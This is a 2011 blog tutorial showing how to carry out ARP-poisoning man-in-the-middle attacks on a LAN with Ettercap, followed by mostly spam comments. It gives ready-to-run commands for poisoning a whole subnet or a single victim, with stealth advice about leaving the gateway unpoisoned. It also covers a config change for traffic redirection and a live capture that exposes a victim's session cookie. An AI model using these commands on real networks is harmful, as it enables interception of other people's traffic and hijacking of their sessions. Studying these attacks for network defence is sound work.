Man-In-The-Middle Attacks With Ettercap

20 June 2011 9 Comments

Man-In-The-Middle Attacks With Ettercap

Contents

1 Introduction
2 Command Syntax
3 Ettercap Configuration
4 Examples
5 In Practice

Introduction

This post explains how to execute a man-in-the-middle attack on Linux. Only the actual attack is described here. The mechanisms of ARP poisoning and man-in-the-middle attacks are explained in a different post.

: A man-in-the-middle attack. It can be achieved in various ways, but MITM through ARP poisoning is a common method.

In this post we demonstrate a MITM with the Ettercap tool. Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN, and pretty much the Swiss army knife of ARP poisoning. Every security researcher should include it in his toolbox, and it is included in the Backtrack Linux distribution. Ettercap features a pretty nice GUI, but in this post we only use the text mode.

Command Syntax

The ettercap program has the following syntax:

ettercap [OPTIONS] [TARGET1] [TARGET2]

The targets can be IPs and MACs, and specific TCP and UDP ports can also be targetted. A simple description of the TARGET1 and TARGET2 syntax is given below. Read the target specification section on the man page for details.

TARGET is in the form MAC/IPs/PORTs. 
 
If you omit any of the parts, it means a wildcard is used for that part.
 
Examples:
//80         means ANY mac address, ANY ip and ONLY port 80
/10.0.0.1/   means ANY mac address, ONLY ip 10.0.0.1 and ANY port

Useful command line options are:

Parameter	Description	Required
-T -G -D	Use console interface Use the GTK+ GUI Daemonize (no interface)	Yes, choose one
-q	Quiet mode. It can be used only in conjunction with the console interface. It does not print packet content.	No
-i <interface>	Use the specified interface	No
-M <method:args>	Start a MITM attack using the provided parameters. The possible methods are arp, dhcp, icmp and port.	No
-M arp[:args]	Start an ARP MITM attack. The arguments are described below.	No

Ettercap Configuration

If you do a MITM attack with ettercap, it will have to ‘forward’ packets from the victim to the correct destination, and the other way around. In order for this to work you need to change your configuration file:

$ nano /usr/local/etc/etter.conf

Look for the following lines in the file, and uncomment them by removing the hashes (except for the one next to “if”). Save and close the file.

Change:

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

To this:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

For ARP poisoning attacks, the configuration file has a lot of options. You should only change these if you know what you are doing. One example is the arp_poision_delay configuration option, which changes the interval with which ettercap re-spoofs the victim(s) during an ARP MITM attack:

arp_poison_warm_up = 1        # seconds
arp_poison_delay = 10         # seconds

The arp_poison_warm_up variable is the interval between the first five spoofed ARP packets. After that, the interval between the packets changes to arp_poison_delay.

Examples

We have an example scenario:

Host	Details
Attacker (the host running ettercap)	MAC=22:22:22:22:22:22
Victim	IP=1.2.3.4
Gateway	IP=1.2.0.0

All these hosts are in the same subnet (switched network). Remember that this is required for ARP communication.

MITM on an Entire Subnet (not recommended)

ettercap -T -M arp // //

This is what the command line options do:

`-T`	Tells ettercap to use the text interface
`-M`	Tells ettercap to execute a MITM attack.
`arp`	Denotes ARP poisoning should be used to perform the attack.
`// //`	Tells ettercap that TARGET1 and TARGET2 consist of all hosts in the subnet.

The result is that for every combination of hosts in the subnet, both sides have their ARP cache poisoned. If there are 100 hosts in the subnet, this will cause a storm of 20,000 ARP packets to be sent. When successful, all network traffic will pass through the attacker’s system. I suggest only doing this on the smallest of networks.

Unidirectional MITM: Victim to Gateway

A more sensible and stealthy command is:

ettercap -T -M arp:oneway,remote /1.2.3.4/ /1.2.0.0/

This is what the command line options mean:

`-T`	Tells ettercap to use the text interface
`-M`	Tells ettercap to execute a MITM attack.
`arp`	Denotes ARP poisoning should be used to perform the attack.
`oneway`	The `oneway` option of the `arp` method specifies that the poisoning should be unidirectional: only from TARGET1 to TARGET2. Poisoning normal clients is less risky than a gateway where an ARP watcher could be in place. By putting the gateway in TARGET2, it remains oblivious to the attack.
`remote`	The `remote` option of the `arp` method tells ettercap to not only sniff direct connections between TARGET1 and TARGET2, but also connections that pass through a TARGET to a remote IP, i.e. if one of the hosts is a gateway.
`/1.2.3.4/`	This tells ettercap that TARGET1 is the IP `1.2.3.4`. The ARP cache of this host will be targeted.
`/1.2.0.0/`	This tells ettercap that TARGET2 is the IP `1.2.0.0`. Because of the `oneway` directive this host is not poisoned.

Here is what the command does:

First, the TARGET ranges are scanned with ARP requests to find all active hosts and corresponding MAC addresses. In this case there is only one host per range: 1.2.3.4 in GROUP1 and 1.2.0.0 in GROUP2.
Then all possible GROUP1 and GROUP2 combinations are spoofed. The only combination is 1.2.3.4 – 1.2.0.0 , and because of the oneway argument only the ARP cache of 1.2.3.4is poisoned:
- Ettercap first sends a spoofed ICMP echo request (from IP 1.2.0.0) to force the ARP entry in the cache. Then it immediately sends a spoofed ARP reply to the victim at 1.2.3.4, containing the gateway IP 1.2.0.0 and the attacker’s MAC address 22:22:22:22:22:22. The victim updates its ARP cache, and any packets that it thinks it sends to the gateway are actually transmitted to the attacker.
Ettercap automatically sniffs all traffic from victim to gateway, then it forwards it to the gateway. Traffic in the other direction (gateway->victim) does not pass through the attacker, so that cannot be sniffed.

Sniffing with a Filter

If your host is acting as a gateway, ettercap can sniff the traffic that passes through it.

ettercap -T -z --proto tcp -f "src host 1.2.3.4 or port 80" //

Use the above syntax to listen for and display all IP traffic with source IP 1.2.3.4 or src/destination port 80.

`-T`	Tells ettercap to use the text interface
`-z`	Silent mode. Tells ettercap to skip the initial ARP scan of the entire subnet (it does this even before sniffing)
`--proto tcp`	Tells ettercap to only sniff TCP traffic
`-f "src host 1.2.3.4 or port 80"`	Tells ettercap to apply the specified libpcap filter to the traffic
`//`	Tells ettercap that we want to look at traffic from the entire subnet

In Practice

Find the IP of the default gateway (router):

$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
132.49.120.0    0.0.0.0         255.255.240.0   U     0      0        0 eth0
0.0.0.0         132.49.120.1    0.0.0.0         UG    100    0        0 eth0

Attack the host with IP 132.49.120.168.

$ sudo ettercap -T -M arp:oneway,remote /132.49.120.168/ /132.49.120.1/
ettercap NG-0.7.3 copyright 2001-2004 ALoR &amp; NaGA
 
Listening on eth0... (Ethernet)
 
eth0 -> 00:01:40:34:A1:92    132.49.120.121     255.255.240.0
 
Privileges dropped to UID 65534 GID 65534...
 
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
 
Scanning for merged targets (2 hosts)...
* |==================================================&gt;| 100.00 %
 
2 hosts added to the hosts list...
 
ARP poisoning victims:
 
GROUP 1 : 132.49.120.168 00:2B:4D:11:66:30
 
GROUP 2 : 132.49.120.1 00:00:0C:07:AC:00
Starting Unified sniffing...
 
Text only Interface activated...
Hit 'h' for inline help
 
Mon Jun 20 14:08:31 2011
TCP  132.89.120.168:8304 --&gt; 83.143.78.29:80 | AP
 
tSuite/TestController.asp?TestTypeID=,8,12,.
Cookie: ASPSESSIONIDAASASSDC=ICEHOOJDKFAIDEPINIGONNAJ; __utma=236849091.1657384024.1308593949.1308593949.1308593949.1; __utmb=236849091; __utmc=236849091; __utmz=236849091.1308593949.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none).
.
../...3C..e.._.......:..Q4.|Sn..g..@..i...l.'...+h.(.nj.T..f0..-.5..mF.8^T=n[IK{9T..F...I(.!~6....4O.J.uaH...-..S......e..76wJ..u..Es.....4..}}'.N....F.......:.~j...M^.....W......tC.....v.s..%..b.Z..T7u./....!..C*...x...0e...5.#..n..Q.X..&amp;r..&gt;.&amp;T.lz../.Z2T.".NKi...a.q......."....b+........-.:....j......e=.Ji.@Bdn.....cu.Y.  ~Xj.5.|,.. .,a...z|....LP,..&gt;.......).u.......

We are now picking up the traffic between our victim and some website (the above packet looks like HTTP traffic).

Tags: arp, arp poisoning, ettercap, mitm

9 Responses to “Man-In-The-Middle Attacks With Ettercap”

any new treatment for tinnitus 12 February 2013 at 6:21 am #

I don’t drop many remarks, however i did some searching and wound up here Man-In-The-Middle Attacks With Ettercap | Tech Juice. And I do have a few questions for you if you tend not to mind. Is it only me or does it look as if like some of the responses appear as if they are written by brain dead folks? And, if you are writing on additional sites, I would like to follow anything fresh you have to post. Would you list of the complete urls of all your public sites like your twitter feed, Facebook page or linkedin profile?

Reply
carneous 13 February 2013 at 10:15 am #

salutaions my very full on this subject and your efforts and sorry for my very bad English because I use google translator.
I tested this method and the only problem I inconveneans or renconterer is that after having run attack my connection is very very bad you have a solution?
I use bt 5 R3 under vmwaire wireless card alfa 500
attacker my pc
victim my laptop
and thank you in advance

Reply
sell property quickly 27 February 2013 at 12:41 am #

With havin so much content do you ever run into any issues of plagorism or copyright violation?
My site has a lot of exclusive content I’ve either authored myself or outsourced but it looks like a lot of it is popping it up all over the internet without my agreement. Do you know any solutions to help reduce content from being stolen? I’d genuinely appreciate it.

Reply
michaelkorsfactoryoutl 13 March 2013 at 5:11 am #

You’ve observed lots of purse styles previously however exactly what are you aware concerning the Michael kors purses? If you don’t learn about all of them, indeed they’re known as because catchy purses. They’re really distinctive, historical, fascinating, incredible, magical, reliable, expert, inexpensive as well as long lasting purses versions, getting your own eye past the actual creativity. Presently Michael kors purses can be found in their very own unique designs as well as designs within the globally marketplace inside least expensive cost prices. The actual creative designers associated with Michael kors purses produce as well as create your own purses having a unique treatment, commitment, dedication, professionalism and reliability, as well as personal inspiration. More to the point, these people frequently make use of lamination methods (Glossy/Matte completing) because of that your personal Michael kors purses appear really distinctive as well as catchy away from personal creativity. Significantly on the internet purses store provides you with inexpensive Michael kors purses globally inside a the majority of expert as well as devoted method. michael kors factory outlet http://michaelkorsfactoryoutlet2013.webstarts.com/

Reply
depressiom in men 1 April 2013 at 9:24 am #

I am not sure where yοu’re getting your info, but good topic. I needs to spend some time learning more or working out more. Thanks for wonderful information I used to be in search of this info for my mission.

Reply
Pwnr127001 1 April 2013 at 1:30 pm #

As another has stated; I rarely post anything to tutorials. But, that being said, this tut is more intuitive and concise than a lot of other tuts. Most tuts are written on one site; copied; rewritten, reworded, then reposted. I am no spring chicken when it comes to Ettercap (or most other netsec tools) and I have been attending Google University for a while now. I will have my tech-juice with my h4x0rflakes. Breakfast of Champions.

Reply
Marilynn 25 April 2013 at 9:06 am #

I was recommended this blog by way of my cousin. I’m now not positive whether this post is written by means of him as nobody else recognise such targeted about my trouble. You’re wonderful!
Thanks!

Reply
Gabriel 26 April 2013 at 5:18 am #

Simply desire to say your article is as astounding. The clarity to your put
up is simply great and i could assume you are a professional on this
subject. Fine along with your permission let me to grab your feed to stay
up to date with imminent post. Thanks a million and please
carry on the gratifying work.

Reply
would you believe that something as simple as how you dress could affect your attitude and self1 16 May 2013 at 11:47 am #

I am really impressed with your writing skills and also with the layout on your weblog. Is this a paid theme or did you modify it yourself? Either way keep up the excellent quality writing, it’s rare to see a nice blog like this one nowadays

Reply

Tech Juice

Programming, Networking, Reversing and More